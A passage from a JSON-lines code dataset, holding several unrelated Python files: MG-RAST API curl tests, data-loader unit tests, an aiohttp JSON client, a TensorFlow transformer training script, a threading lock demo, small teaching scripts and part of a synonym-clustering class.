a = check_output('''curl '{}' '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n assert b\"alignment\" in a\n\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_blast_result_https(API_URL):\n URL = API_URL + \"/compute/blast/mgm4447943.3?md5=0001c08aa276d154b7696f9758839786\"\n a = check_output('''curl '{}' '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n assert b\"alignment\" in a\n\n#def test_post1(API_URL):\n# CMD = '''curl -X POST -d '{\"source\":\"KO\",\"type\":\"function\",\"md5s\":[\"000821a2e2f63df1a3873e4b280002a8\",\"15bf1950bd9867099e72ea6516e3d602\"]}' \"https://api.mg-rast.org/annotation/sequence/mgm4447943.3\"''' # EMPTY RETURN DATA\n\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_post2(API_URL):\n URL = API_URL + \"/annotation/sequence/mgm4447943.3\"\n CMD = '''curl -X POST -d '{\"source\":\"SwissProt\",\"type\":\"organism\",\"md5s\":[\"000821a2e2f63df1a3873e4b280002a8\",\"15bf1950bd9867099e72ea6516e3d602\"]}' \"''' + API_URL + '''\"'''\n a = check_output(CMD, shell=True)\n assert b\"ERROR\" not in a\n\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_errs_matrix_function(API_URL):\n URL = API_URL + \"/matrix/function?id=mgm4447943.3&id=mgm4447192.3&id=mgm4447102.3&group_level=level3&source=Subsystems&identity=80\"\n print(URL)\n a = check_output('''curl '{}' '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_errs_profile(API_URL):\n URL = API_URL + \"/profile/mgm4447943.3?source=RefSeq&format=biom\"\n print(URL)\n a = check_output('''curl '{}' '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_errs_matrix_organism(API_URL):\n URL = API_URL + \"/matrix/organism?id=mgm4447943.3&id=mgm4447192.3&id=mgm4447102.3&group_level=family&source=RefSeq&evalue=15\"\n print(URL)\n a = check_output('''curl '{}' '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_errs_library(API_URL):\n URL = API_URL + \"/library/mgl52924?verbosity=full\"\n print(URL)\n a = check_output('''curl '{}' '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_errs_metadata(API_URL):\n URL = API_URL + \"/metadata/ontology?name=biome&version=2017-04-15\"\n print(URL)\n a = check_output('''curl '{}' '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_errs_darkmatter(API_URL):\n URL = API_URL + \"/darkmatter/mgm4447943.3?\"\n print(URL)\n a = check_output('''curl '{}' '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_errs_download_history(API_URL):\n URL = API_URL + \"/download/history/mgm4447943.3\"\n print(URL)\n a = check_output('''curl '{}' '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n\n","sub_path":"tests/test_byhand.py","file_name":"test_byhand.py","file_ext":"py","file_size_in_byte":5107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"31588104","text":"from copy import deepcopy\nfrom typing import Dict, Generator, List, Tuple\nfrom unittest import TestCase\nfrom unittest.mock import Mock, patch\nfrom . import data_loader_helper\n\nTEST_DEPENDENCY_GROUPS = [\n {\n \"instances\": 3,\n \"customer\": {\n \"id_base\": 1000,\n \"flags\": [\n {\"flag_definition_id\": \"CUSTOMER_FLAG_DEFINITION_1\"},\n {\"flag_definition_id\": \"CUSTOMER_FLAG_DEFINITION_2\"},\n ],\n },\n \"accounts\": [\n {\n \"account_opening_timestamp\": \"2020-01-01T00:00:00Z\",\n \"instance_param_vals\": {\n \"loan_term\": \"2\",\n \"loan_amount\": \"3000\",\n \"gross_interest_rate\": \"0.098\",\n \"repayment_day\": \"6\",\n },\n \"flags\": [\n {\"flag_definition_id\": \"ACCOUNT_FLAG_DEFINITION_1\"},\n {\"flag_definition_id\": \"ACCOUNT_FLAG_DEFINITION_2\"},\n ],\n }\n ],\n }\n]\n\n\ndef resource_extractors(\n request: Dict,\n) -> Tuple[Generator, Generator, Generator, Generator]:\n\n customer_extractor = (\n resource\n for resource in request[\"resource_batch\"][\"resources\"]\n if \"customer_resource\" in resource\n )\n account_extractor = (\n resource\n for resource in request[\"resource_batch\"][\"resources\"]\n if \"account_resource\" in resource\n )\n customer_flag_extractor = (\n resource\n for resource in request[\"resource_batch\"][\"resources\"]\n if \"flag_resource\" in resource and \"customer_id\" in resource[\"flag_resource\"]\n )\n account_flag_extractor = (\n resource\n for resource in request[\"resource_batch\"][\"resources\"]\n if \"flag_resource\" in resource and \"account_id\" in resource[\"flag_resource\"]\n )\n\n return (\n customer_extractor,\n account_extractor,\n customer_flag_extractor,\n account_flag_extractor,\n )\n\n\nclass DataLoaderHelperTests(TestCase):\n def setUp(self) -> None:\n self.dependency_groups = deepcopy(TEST_DEPENDENCY_GROUPS)\n return super().setUp()\n\n def test_resource_ids_populated_with_customer_ids(self):\n\n customer_ids = []\n for (\n _,\n batch_resource_ids,\n ) in data_loader_helper.create_dataloader_resource_batch_requests(\n dependency_groups=self.dependency_groups,\n product_version_id=\"1\",\n ):\n customer_ids.append(batch_resource_ids.customer_ids)\n\n self.assertListEqual(customer_ids, [[\"1000\", \"1001\", \"1002\"]])\n\n def test_resource_ids_populated_with_account_ids(self):\n\n account_ids: List[List[str]] = []\n for (\n _,\n batch_resource_ids,\n ) in data_loader_helper.create_dataloader_resource_batch_requests(\n dependency_groups=self.dependency_groups,\n product_version_id=\"1\",\n ):\n account_ids.append(\n [\n account_id.split(\"_\", 1)[0]\n for account_id in batch_resource_ids.account_ids\n ]\n )\n\n self.assertListEqual(account_ids, [[\"0\", \"1\", \"2\"]])\n\n @patch.object(data_loader_helper, \"get_flag_resource\")\n def test_resource_ids_populated_with_customer_flag_ids(\n self, get_flag_resource: Mock\n ):\n\n expected_customer_flag_ids = [\n \"1000_CUSTOMER_FLAG_DEFINITION_1\",\n \"1000_CUSTOMER_FLAG_DEFINITION_2\",\n \"1001_CUSTOMER_FLAG_DEFINITION_1\",\n \"1001_CUSTOMER_FLAG_DEFINITION_2\",\n \"1002_CUSTOMER_FLAG_DEFINITION_1\",\n \"1002_CUSTOMER_FLAG_DEFINITION_2\",\n ]\n # Flag ids are randomly generated, so we patch get_flag_resource to get around this\n get_flag_resource.side_effect = [\n {\"id\": id} for id in expected_customer_flag_ids\n ]\n\n flag_ids = []\n self.dependency_groups[0][\"accounts\"][0][\"flags\"] = []\n for (\n _,\n batch_resource_ids,\n ) in data_loader_helper.create_dataloader_resource_batch_requests(\n dependency_groups=self.dependency_groups,\n product_version_id=\"1\",\n ):\n flag_ids.extend(batch_resource_ids.flag_ids)\n\n self.assertListEqual(flag_ids, expected_customer_flag_ids)\n\n @patch.object(data_loader_helper, \"get_flag_resource\")\n def test_resource_ids_populated_with_account_flag_ids(\n self, get_flag_resource: Mock\n ):\n\n expected_account_flag_ids = [\n \"0_ACCOUNT_FLAG_DEFINITION_1\",\n \"0_ACCOUNT_FLAG_DEFINITION_2\",\n \"1_ACCOUNT_FLAG_DEFINITION_1\",\n \"1_ACCOUNT_FLAG_DEFINITION_2\",\n \"2_ACCOUNT_FLAG_DEFINITION_1\",\n \"2_ACCOUNT_FLAG_DEFINITION_2\",\n ]\n # Flag ids are randomly generated, so we patch get_flag_resource to get around this\n get_flag_resource.side_effect = [{\"id\": id} for id in expected_account_flag_ids]\n\n flag_ids = []\n self.dependency_groups[0][\"customer\"][\"flags\"] = []\n for (\n _,\n batch_resource_ids,\n ) in data_loader_helper.create_dataloader_resource_batch_requests(\n dependency_groups=self.dependency_groups,\n product_version_id=\"1\",\n ):\n flag_ids.extend(batch_resource_ids.flag_ids)\n\n self.assertListEqual(flag_ids, expected_account_flag_ids)\n\n @patch.object(data_loader_helper, \"get_flag_resource\")\n def test_resource_ids_segregated_by_batch(self, get_flag_resource: Mock):\n\n expected_account_flag_ids = [\n [\n \"0_ACCOUNT_FLAG_DEFINITION_1\",\n \"0_ACCOUNT_FLAG_DEFINITION_2\",\n ],\n [\n \"1_ACCOUNT_FLAG_DEFINITION_1\",\n \"1_ACCOUNT_FLAG_DEFINITION_2\",\n ],\n [\n \"2_ACCOUNT_FLAG_DEFINITION_1\",\n \"2_ACCOUNT_FLAG_DEFINITION_2\",\n ],\n ]\n\n # Flag ids are randomly generated, so we patch get_flag_resource to get around this\n get_flag_resource.side_effect = [\n {\"id\": id}\n for batch_flags in expected_account_flag_ids\n for id in batch_flags\n ]\n\n flag_ids = []\n self.dependency_groups[0][\"customer\"][\"flags\"] = []\n for (\n _,\n batch_resource_ids,\n ) in data_loader_helper.create_dataloader_resource_batch_requests(\n dependency_groups=self.dependency_groups,\n product_version_id=\"1\",\n # The low batch size will result in multiple batches\n batch_size=3,\n ):\n flag_ids.append(batch_resource_ids.flag_ids)\n\n self.assertListEqual(flag_ids, expected_account_flag_ids)\n\n def test_batch_size_greater_than_batch_still_results_in_request(self):\n\n for (\n request,\n _,\n ) in data_loader_helper.create_dataloader_resource_batch_requests(\n dependency_groups=self.dependency_groups,\n product_version_id=\"1\",\n batch_size=1000,\n ):\n self.assertEqual(\n len(request[\"resource_batch\"][\"resources\"]),\n 18,\n \"Expected 18 resources: 3* (1 customer, 2 customer flags, 1 account, 2 customer\"\n \" flags)\",\n )\n\n def test_resources_from_same_instance_not_split_across_batches(self):\n\n for (\n request,\n _,\n ) in data_loader_helper.create_dataloader_resource_batch_requests(\n dependency_groups=self.dependency_groups,\n product_version_id=\"1\",\n batch_size=1,\n ):\n # Each batch has 1 customer, 2 customer flags, 1 account, 2 customer flags\n # despite batch_size = 1\n self.assertEqual(len(request[\"resource_batch\"][\"resources\"]), 6)\n\n def test_resources_split_across_batches(self):\n\n all_requests = []\n for (\n request,\n _,\n ) in data_loader_helper.create_dataloader_resource_batch_requests(\n dependency_groups=self.dependency_groups,\n product_version_id=\"1\",\n # this batch size will result in two batches, one with 12 resources and the other 6\n batch_size=12,\n ):\n all_requests.append(request)\n\n batch_resource_counts = [\n len(request[\"resource_batch\"][\"resources\"]) for request in all_requests\n ]\n self.assertListEqual(batch_resource_counts, [12, 6])\n\n def test_account_customer_dependencies_set_correctly(self):\n\n self.dependency_groups[0][\"instances\"] = 1\n self.dependency_groups[0][\"customer\"][\"flags\"] = []\n self.dependency_groups[0][\"accounts\"][0][\"flags\"] = []\n all_requests = []\n for (\n request,\n _,\n ) in data_loader_helper.create_dataloader_resource_batch_requests(\n dependency_groups=self.dependency_groups,\n product_version_id=\"1\",\n ):\n all_requests.append(request)\n\n customers, accounts, _, _ = resource_extractors(all_requests[0])\n customer_resource = next(customers)\n account_resource = next(accounts)\n\n self.assertListEqual(\n [account_resource[\"id\"]], customer_resource[\"dependencies\"]\n )\n self.assertListEqual(\n [customer_resource[\"id\"]], account_resource[\"dependencies\"]\n )\n\n def test_customer_flags_dependencies_set_correctly(self):\n\n self.dependency_groups[0][\"instances\"] = 1\n all_requests = []\n for (\n request,\n _,\n ) in data_loader_helper.create_dataloader_resource_batch_requests(\n dependency_groups=self.dependency_groups,\n product_version_id=\"1\",\n ):\n all_requests.append(request)\n\n customers, accounts, customer_flags, _ = resource_extractors(all_requests[0])\n customer_resource = next(customers)\n account_resource = next(accounts)\n customer_flag_1 = next(customer_flags)\n customer_flag_2 = next(customer_flags)\n\n self.assertListEqual(\n [customer_resource[\"id\"]],\n customer_flag_1[\"dependencies\"],\n \"Customer flag should have a dependency on the customer\",\n )\n self.assertListEqual(\n [customer_resource[\"id\"]],\n customer_flag_2[\"dependencies\"],\n \"Customer flag should have a dependency on the customer\",\n )\n self.assertListEqual(\n [customer_flag_1[\"id\"], customer_flag_2[\"id\"], account_resource[\"id\"]],\n customer_resource[\"dependencies\"],\n \"Customer should have dependencies on both of its flags and the account\",\n )\n\n def test_account_flags_dependencies_set_correctly(self):\n\n self.dependency_groups[0][\"instances\"] = 1\n all_requests = []\n for (\n request,\n _,\n ) in data_loader_helper.create_dataloader_resource_batch_requests(\n dependency_groups=self.dependency_groups,\n product_version_id=\"1\",\n ):\n all_requests.append(request)\n\n _, accounts, _, account_flags = resource_extractors(all_requests[0])\n\n account_resource = next(accounts)\n account_flag_1 = next(account_flags)\n account_flag_2 = next(account_flags)\n\n self.assertListEqual(\n [account_resource[\"id\"]],\n account_flag_1[\"dependencies\"],\n \"Account flag should have a dependency on the account\",\n )\n\n self.assertListEqual(\n [account_resource[\"id\"]],\n account_flag_2[\"dependencies\"],\n \"Account flag should have a dependency on the account\",\n )\n self.assertListEqual(\n [\"1000\", account_flag_1[\"id\"], account_flag_2[\"id\"]],\n account_resource[\"dependencies\"],\n \"Account should have dependencies on the customer and both of its flags\",\n )\n","sub_path":"common/test_utils/endtoend/test_data_loader_helper.py","file_name":"test_data_loader_helper.py","file_ext":"py","file_size_in_byte":12070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"85524703","text":"import json\nimport pprint\nimport aiohttp\n\n\nclass ClientResponseError(Exception):\n \"\"\" ClientResponseError exception class \"\"\"\n\n def __init__(self, wrapped_exception, context):\n super().__init__(\n \"Url {} returned status {}\\n{}\".format(\n context['url'], context['status'], pprint.pformat(context)\n )\n )\n self.wrapped_exception = wrapped_exception\n self.context = context\n\n\nclass ReminizJSONDecodeError(ValueError):\n \"\"\"\n A simple variant of the built-in JSONDecodeError, to allow\n having the failing document in the error message.\n \"\"\"\n\n def __init__(self, msg, doc, pos):\n inner_error = json.JSONDecodeError(msg, doc, pos)\n super().__init__(inner_error.args[0] + '\\n' + doc)\n\n\nclass ClientResponse:\n \"\"\" Encapsulate the data returned by the API \"\"\"\n\n def __init__(self, data, headers, status):\n self.data = data\n self.headers = headers\n self.status = status\n\n def __str__(self):\n return \"ClientResponse: \" + str(self.__dict__)\n\n\nclass JSONClient:\n \"\"\"\n Utility to encapsulate HTTP calls to a JSON API\n \"\"\"\n\n def __init__(self, base_url, *, credentials=None, default_headers={}, timeout=5 * 60):\n \"\"\"\n :param base_url: root URL of the JSON server\n :param credentials: tuple (username, pass) for basic HTTP auth\n :param default_headers: headers passed to every request\n \"\"\"\n\n self._memoized_session = None\n self.base_url = base_url\n self.credentials = credentials\n self.default_headers = default_headers\n self.timeout = timeout\n\n async def __aenter__(self):\n \"\"\"\n Allows using the client as an async context managor:\n\n Example:\n\n ```\n async with JSONClient(...) as client:\n await client.get('/')\n ```\n \"\"\"\n\n return self\n\n async def __aexit__(self, *_args):\n await self.cleanup()\n\n @property\n def _session(self):\n if self._memoized_session is None:\n auth = aiohttp.BasicAuth(\n login=self.credentials[0], password=self.credentials[1]\n ) if self.credentials else None\n\n client_timeout = aiohttp.ClientTimeout(total=self.timeout)\n self._memoized_session = aiohttp.ClientSession(\n auth=auth, headers=self.default_headers, timeout=client_timeout\n )\n return self._memoized_session\n\n async def fetch(\n self,\n method,\n url,\n query,\n data,\n *,\n headers={},\n raise_on_failure=True,\n data_only=True,\n ):\n \"\"\"\n Make a http request to JSON endpoint.\n\n Use of method-specfic functions is prefered.\n\n :param method: HTTP method to use\n :param url: url relative to `base_url`\n :param query: dict representing query parameters\n :param data: dict representing body of the request (will be json encoded)\n :param headers: dict with request headers\n :param raise_on_failure: if `True`, raise an exception for 4XX status code\n :param data_only: if `False` return a ClientResponse object instead of a dict\n \"\"\"\n url = self.base_url + url\n fetch_func = getattr(self._session, method)\n async with fetch_func(url, params=query, json=data, headers=headers) as resp:\n try:\n response_data = await resp.text()\n json_data = json.loads(response_data if response_data else \"{}\")\n\n if raise_on_failure:\n resp.raise_for_status()\n\n if data_only:\n return json_data\n return ClientResponse(json_data, resp.headers, resp.status)\n\n except aiohttp.ClientResponseError as exception:\n raise ClientResponseError(\n exception, {\n 'url': url,\n 'query': query,\n 'data': data,\n 'response': json_data,\n 'status': resp.status\n }\n )\n except json.JSONDecodeError as error:\n raise ReminizJSONDecodeError(error.msg, error.doc, error.pos)\n\n async def get(self, url, query, **kwargs):\n return await self.fetch('get', url, query, None, **kwargs)\n\n async def post(self, url, data, **kwargs):\n return await self.fetch('post', url, None, data, **kwargs)\n\n async def put(self, url, data, **kwargs):\n return await self.fetch('put', url, None, data, **kwargs)\n\n async def patch(self, url, query, data, **kwargs):\n return await self.fetch('patch', url, query, data, **kwargs)\n\n async def delete(self, url, query, **kwargs):\n return await self.fetch('delete', url, query, None, **kwargs)\n\n async def cleanup(self):\n \"\"\"\n Cleanup allocated resources\n \"\"\"\n if self._memoized_session is not None:\n await self._memoized_session.close()\n self._memoized_session = None\n","sub_path":"shared-libs/python/reminiz_utils/http/json_client.py","file_name":"json_client.py","file_ext":"py","file_size_in_byte":5111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"201740050","text":"class KitchenStuff:\n def __init__(self, color, volume):\n self.color = \"light\" + color\n self.volume = volume\n\n def serve(self):\n return f\"Here you have a {self.color} {self.volume}.\"\n\n\nclass Cup(KitchenStuff):\n def __init__(self, color, volume, liquid, style):\n super().__init__(color, volume)\n\n self.liquid = liquid\n self.style = style\n\n def pour_down(self):\n return f\"Pouring {self.volume} ml of {self.liquid}.\"\n\n\nclass Plate(KitchenStuff):\n def __init__(self, color, volume, dish):\n super().__init__(color, volume)\n\n self.dish = dish\n\n def serve(self):\n return f\"Here you have a {self.color} plate of {self.dish}.\"\n\n\noriental_cup = Cup(color=\"red\", volume=200, liquid=\"tea\", style=\"oriental\")\nclassic_cup = Cup(color=\"white\", volume=500, liquid=\"juice\", style=\"classic\")\n\nfish_plate = Plate(color=\"gray\", volume=700, dish=\"fish\")\npasta_plate = Plate(color=\"brown\", volume=1000, dish=\"pasta\")\n\nmy_cups = [oriental_cup, classic_cup]\nmy_plates = [fish_plate, pasta_plate]\n\nfor cup in my_cups:\n print(f\"I like my {cup.color} {cup.style} cup because it has {cup.volume} ml of {cup.liquid}.\")\n print(cup.serve())\n print(cup.pour_down())\n\nfor plate in my_plates:\n print(f\"This is a {plate.color} plate of {plate.dish}.\")\n print(plate.serve())\n","sub_path":"13_OOP.py","file_name":"13_OOP.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"373892802","text":"import numpy as np\nimport tensorflow as tf\nimport os\nimport time\nimport datetime\nimport sys\nimport collections\nimport utils\nfrom transformer import Transformer\n\n\n\n# Data\ntf.flags.DEFINE_string(\"data_path\", \"./data/\", \"Data path\")\ntf.flags.DEFINE_string(\"train\", \"train.txt.npy\", \"Data path to training\")\ntf.flags.DEFINE_string(\"validation\", \"validation.txt.npy\", \"Data path to dev\")\ntf.flags.DEFINE_string(\"calculateEvaluationCCC\", \"./data/calculateEvaluationCCC.py\", \"CCC eval script\")\ntf.flags.DEFINE_string(\"fileCSV\", \"./data/omg_ValidationVideos.csv\", \"validation file\")\n\ntf.flags.DEFINE_string(\"checkpoint_path\", \"./runs/\", \"Data path to dev\")\n\n# Mode\ntf.flags.DEFINE_boolean(\"eval\", False, \"Use test set\")\n\n# model parameter\ntf.flags.DEFINE_integer(\"stack_num\", 2, 'stack num')\ntf.flags.DEFINE_integer(\"d_k\", 64, 'key dim')\ntf.flags.DEFINE_integer(\"d_v\", 64, 'value dim')\ntf.flags.DEFINE_integer(\"h\", 8, 'stack of multihead attention')\ntf.flags.DEFINE_integer(\"d_ff\", 256, 'feed forward dim')\ntf.flags.DEFINE_float('dropout_keep', 0.8, 'dropout keep rate')\n\n#hyper parameters\ntf.flags.DEFINE_integer(\"batch_size\", 2, \"Batch Size (default: 64)\")\ntf.flags.DEFINE_integer(\"num_epochs\", 1000, \"Number of training epochs (default: 200)\")\ntf.flags.DEFINE_integer(\"evaluate_every\", 50, \"Evaluate model on dev set after this many steps (default: 100)\")\ntf.flags.DEFINE_integer(\"early_stop\", 10, \"Stop if no improvement after x epoch\")\n\n\n# Misc Parameters\ntf.flags.DEFINE_boolean(\"allow_soft_placement\", True, \"Allow device soft device placement\")\ntf.flags.DEFINE_boolean(\"log_device_placement\", False, \"Log placement of ops on devices\")\n\n\n\nFLAGS = tf.flags.FLAGS\nFLAGS._parse_flags()\n\n#getting path of data\nx = os.path.join(FLAGS.data_path, FLAGS.train)\nx_dev = os.path.join(FLAGS.data_path, FLAGS.validation)\n\n#opening data\nX = np.load(x)\nX_dev = np.load(x_dev)\n\n\n\ndev_mode = \"Test\" if FLAGS.eval else \"Validation\"\n\n#stack data per videos : size [videos, uterances, feature_size]\nX_sorted, Y_sorted, X_seq_length, X_pad_length = utils.get_sorted_data(X, \"Train\", FLAGS.data_path)\nX_dev_sorted, Y_dev_sorted, X_dev_seq_length, X_dev_pad_length = utils.get_sorted_data(X_dev, dev_mode, FLAGS.data_path)\n\n\n#creating checkpoint folder\nout_dir = os.path.join(FLAGS.checkpoint_path, str(int(time.time())))\n\nif not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\nwith tf.Graph().as_default():\n session_conf = tf.ConfigProto(\n allow_soft_placement=FLAGS.allow_soft_placement,\n log_device_placement=FLAGS.log_device_placement)\n sess = tf.Session(config=session_conf)\n with sess.as_default():\n\n model = Transformer(num_features=X.shape[1],\n batch_size=FLAGS.batch_size,\n stack_num=FLAGS.stack_num,\n d_k=FLAGS.d_k,\n d_v=FLAGS.d_v,\n h=FLAGS.h,\n d_ff=FLAGS.d_ff,\n pad_length=X_pad_length\n )\n\n model_dev = Transformer(num_features=X_dev_sorted.shape[2],\n batch_size=X_dev_sorted.shape[0],\n stack_num=FLAGS.stack_num,\n d_k=FLAGS.d_k,\n d_v=FLAGS.d_v,\n h=FLAGS.h,\n d_ff=FLAGS.d_ff,\n pad_length=X_dev_pad_length,\n )\n\n\n # Define Training procedure\n train_op = tf.train.AdamOptimizer(1e-4).minimize(model.loss)\n global_step = 0\n\n saver = tf.train.Saver(tf.all_variables())\n sess.run(tf.initialize_all_variables())\n\n\n def train_step(X_batch, Y_batch, X_batch_seq_length):\n \"\"\"\n A single training step\n \"\"\"\n feed_dict = {\n model.inputs: X_batch,\n model.outputs: Y_batch,\n model.inputs_lengths: X_batch_seq_length,\n model.dropout_keep_prob: FLAGS.dropout_keep\n }\n\n _, loss = sess.run(\n [train_op, model.loss],\n feed_dict)\n\n def dev_step(X_batch, Y_batch, X_batch_seq_length):\n \"\"\"\n A single training step\n \"\"\"\n feed_dict = {\n model_dev.inputs: X_batch,\n model_dev.outputs: Y_batch,\n model_dev.inputs_lengths: X_batch_seq_length,\n model_dev.dropout_keep_prob: 1.0\n }\n\n loss, scores = sess.run(\n [model_dev.loss, model_dev.masked_scores],\n feed_dict)\n scores = np.array(scores).T\n\n mean_ccc = utils.write_ccc_csv(scores, FLAGS.calculateEvaluationCCC, FLAGS.fileCSV, out_dir, verbose=False)\n\n #0 is mean, 1 is ar, 2 is val\n if mean_ccc[0] > dev_step.best_loss[0]:\n dev_step.best_loss = mean_ccc\n\n path = saver.save(sess, os.path.join(out_dir, \"checkpoint\"), global_step=global_step)\n\n best_scores_path = os.path.join(out_dir, \"best_scores.txt\")\n with open(best_scores_path , \"a+\") as f:\n f.write(\"{} \\t {} \\n\".format(global_step, dev_step.best_loss[0]))\n\n dev_step.early_stop = 0\n\n time_str = datetime.datetime.now().isoformat()\n print(\"dev {}: step {}, loss {}\".format(time_str, global_step, loss))\n\n\n dev_step.best_loss = [0.0, 0.0, 0.0]\n dev_step.early_stop = 0\n # Generate batches\n batches = utils.batch_iter(X_sorted, Y_sorted, X_seq_length, FLAGS.batch_size, FLAGS.num_epochs)\n\n # Training loop. For each batch...\n for batch in batches:\n global_step += 1\n\n X_batch, Y_batch, X_batch_seq_length = batch\n train_step(X_batch, Y_batch, X_batch_seq_length)\n if global_step % FLAGS.evaluate_every == 0:\n dev_step.early_stop += 1\n print(\"Evaluation:\")\n dev_step(X_dev_sorted, Y_dev_sorted, X_dev_seq_length)\n print(\"\")\n\n how_many_eval = int((X_sorted.shape[0]/FLAGS.batch_size/FLAGS.evaluate_every)*10)\n if dev_step.early_stop == how_many_eval:\n with open(os.path.join(\"runs\", \"best_scores_overall.txt\"), \"a+\") as f:\n f.write(\"{}({}/{}) \\t {} \\n\".format(dev_step.best_loss[0], dev_step.best_loss[1], dev_step.best_loss[2], out_dir))\n sys.exit()\n","sub_path":"context/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"405354126","text":"'''锁:解决数据不安全问题'''\n\nfrom threading import Thread\nimport time\nfrom multiprocessing import Lock\nnum = 100\n\ndef func(t_lock):\n global num\n # num -= 1\n t_lock.acquire()\n mid = num\n mid = mid - 1\n\n time.sleep(0.00001)\n num = mid\n t_lock.release()\nif __name__ == '__main__':\n t_lock = Lock() #锁对象,同步锁\n t_lst = []\n for i in range(10):\n t = Thread(target=func,args=(t_lock,))\n t.start()\n t_lst.append(t)\n [tt.join() for tt in t_lst]\n print('主线程>>>',num)\n\n\n\n","sub_path":"day27/04-线程数据共享不安全.py","file_name":"04-线程数据共享不安全.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"109617085","text":"from sys import argv\n\nscript, filename =argv\n\nfileopen = open(filename,'r+')\nprint(\"currently this file has below text \\n\")\n\nprint(fileopen.read())\n\nprint(\"do you want to append \\n if no then press ctrl c \")\n\ninput(\"? \")\n\nfileopen.truncate()\nprint(\" ready to type few line to add\")\n\nline1 = input(\"type your first line \")\nline2 = input(\"add more line \")\nline3 = input(\" pick your last line \" )\n\nfileopen.write(line1 +\"\\n\"+ line2+\"\\n\"+line3+ \"\\n\")\n\n\n\n#close the file\n\nfileopen.close()\n\n\n\n\n\n\n","sub_path":"Desktop/Project_codes/Learn Python the hard way/ex16a.py","file_name":"ex16a.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"407683079","text":"#!/usr/bin/env python\n# -- coding: UTF-8 --\n\n\"\"\"\nShort Description: Enriches Table C by clustering the remaining Si-Ai synonyms that are not attractors\nComments: find_best_attractor can be improved. Can't really understand the influence of the vector distance\nwith the example date you gave me. From what I saw, it does not influence in the clustering. Needs further analysis.\n\nCreated on 10/06/2017\n\n:author: hpcosta\n\"\"\"\n\nimport logging\nimport json\nfrom similarity.vector_distance import VectorDistance\nfrom similarity.string_similarity import StringSimilarity\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p ::')\n\n\nclass EnrichingTableC(object):\n\t\"\"\" docstring \"\"\"\n\n\tdef __init__(self, table_c_with_attractor, m_t, attractors_list):\n\t\t\"\"\"Constructor for clustering\"\"\"\n\t\tself.table_c_with_attractor = table_c_with_attractor\n\t\tself.m_t = m_t\n\t\tself.attractors_list = attractors_list\n\t\tself.vec_dist = VectorDistance(self.m_t)\n\t\tself.string_sim = StringSimilarity()\n\t\tself.enriched_table_c = dict()\n\n\tdef clustering(self):\n\t\t\"\"\"\n\t\tClusters the remaining s synonyms that are not attractors to the table C, i.e. to Ai\n\t\t\"\"\"\n\t\tattractor_synset = dict((i, list()) for i in self.attractors_list)\n\t\tsynonyms_already_taken = list(self.attractors_list)\n\t\tfor m_t_code, m_t_value in self.m_t.iteritems(): # m_t = {code{description, synset[synonyms]}}\n\n\t\t\tfor description, synset in m_t_value.iteritems(): # {description, synset[synonyms]}\n\n\t\t\t\tfor synonym in synset: # synset[synonyms] in m_t\n\t\t\t\t\t# S-Ai\n\t\t\t\t\t# print('SYNONYM: ' + synonym)\n\t\t\t\t\tif synonym.lower() not in synonyms_already_taken:\n\t\t\t\t\t\tsynonyms_already_taken.append(synonym.lower())\n\t\t\t\t\t\tbest_attractor = self.find_best_attractor(synonym)\n\t\t\t\t\t\t# print('for this synonym: ' + synonym)\n\t\t\t\t\t\t# print('the best attractor is: ' + best_attractor)\n\n\t\t\t\t\t\t# appending the synonyms to the right synset\n\t\t\t\t\t\tif best_attractor in attractor_synset:\n\t\t\t\t\t\t\tprev_syn_list = attractor_synset[best_attractor]\n\t\t\t\t\t\t\tprev_syn_list.append(synonym)\n\t\t\t\t\t\t\tattractor_synset[best_attractor] = prev_syn_list\n\n\t\t# print(json.dumps(attractor_synset, sort_keys=True, indent=4))\n\t\tself.__build_enriched_table_c(attractor_synset)\n\n\tdef find_best_attractor(self, synonym):\n\t\t\"\"\"\n\t\tGiven a synonym Si this functions finds the best attractor Ai\n\t\t:param synonym: Si\n\t\t:type synonym: str\n\t\t:return: Ai\n\t\t:rtype: str\n\t\t\"\"\"\n\t\tmax_sim = -1\n\t\tbest_attractor = ''\n\t\tfor attractor in self.attractors_list:\n\t\t\tv_dis = self.vec_dist.cal_vect_dist(attractor, synonym)\n\t\t\ts_sim = self.string_sim.calc_similarity(attractor, synonym)\n\t\t\tcurrent_sim = (v_dis + s_sim) / 2.0\n\t\t\tif current_sim > max_sim:\n\t\t\t\tmax_sim = current_sim\n\t\t\t\tbest_attractor = attractor\n\t\treturn best_attractor\n\n\tdef __build_enriched_table_c(self, attractor_synset):\n\t\t\"\"\"\n\t\tBuilds the enriched table c\n\t\t:param attractor_synset: attractor dictionary with the associated synset of synonyms\n\t\t:type attractor_synset: 